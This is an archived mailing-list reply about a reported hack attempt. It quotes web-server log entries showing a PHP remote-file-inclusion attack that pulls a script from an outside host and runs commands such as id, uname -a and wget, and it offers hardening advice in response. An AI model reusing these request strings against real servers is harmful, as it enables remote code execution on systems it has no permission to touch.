[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Hack attempt
hi norbert
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
time for you to patch and update to latest php
or better still, turn it off esp if you don't need it
tons of things to fix up ... to harden the server
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
time to remove wget, lynx, and equiv apps
> Has someone seen this kind of attack ?
it's either eggdrop or modified clones/derivatives
> (chkrootkit doesn't detect it).
so much for chkrootkit :-)
smart/intelligent people investigating for "whats cooking" is better
than automated tools
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> the uploaded scripts.
probably another cracked box ... long list to follow to find the
actual cracker
c ya
alvin
- References:
- Hack attempt
- From: Norbert Crettol <norbert.crettol@idiap.ch>